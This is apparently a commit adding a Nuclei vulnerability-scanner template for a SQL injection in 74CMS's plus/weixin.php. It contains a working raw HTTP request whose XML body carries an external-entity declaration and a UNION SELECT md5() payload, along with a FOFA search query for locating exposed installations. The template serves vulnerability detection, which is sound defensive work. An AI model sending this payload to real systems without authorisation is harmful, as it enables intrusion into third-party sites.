Merge pull request #8052 from projectdiscovery/74cms-weixin-sqli
Create 74cms-weixin-sqli.yamlpatch-1
commit
bf0a1dd961
|
@ -0,0 +1,38 @@
|
||||||
|
id: 74cms-weixin-sqli
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: 74CMS weixin.php - SQL Injection
|
||||||
|
author: SleepingBag945
|
||||||
|
severity: high
|
||||||
|
description: |
|
||||||
|
There is a libxml_disable_entity_loader function to prevent XML eXternal Entity Injection, but this function needs to be customized by the user. If the user does not customize it, there will be no filtering, which leads to SQL injection vulnerabilities.
|
||||||
|
reference:
|
||||||
|
- https://cn-sec.com/archives/25900.html
|
||||||
|
metadata:
|
||||||
|
max-request: 1
|
||||||
|
verified: true
|
||||||
|
fofa-query: app="骑士-74CMS"
|
||||||
|
tags: 74cms,weixin,sqli
|
||||||
|
|
||||||
|
variables:
|
||||||
|
num: '999999999'
|
||||||
|
|
||||||
|
http:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709×tamp=&nonce= HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Content-Type: text/xml
|
||||||
|
|
||||||
|
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///">]><xml><ToUserName>&test;</ToUserName><FromUserName>1111</FromUserName><MsgType>123</MsgType><FuncFlag>3</FuncFlag><Content>1%' union select md5({{num}})#</Content></xml>
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- '{{md5(num)}}'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
Loading…
Reference in New Issue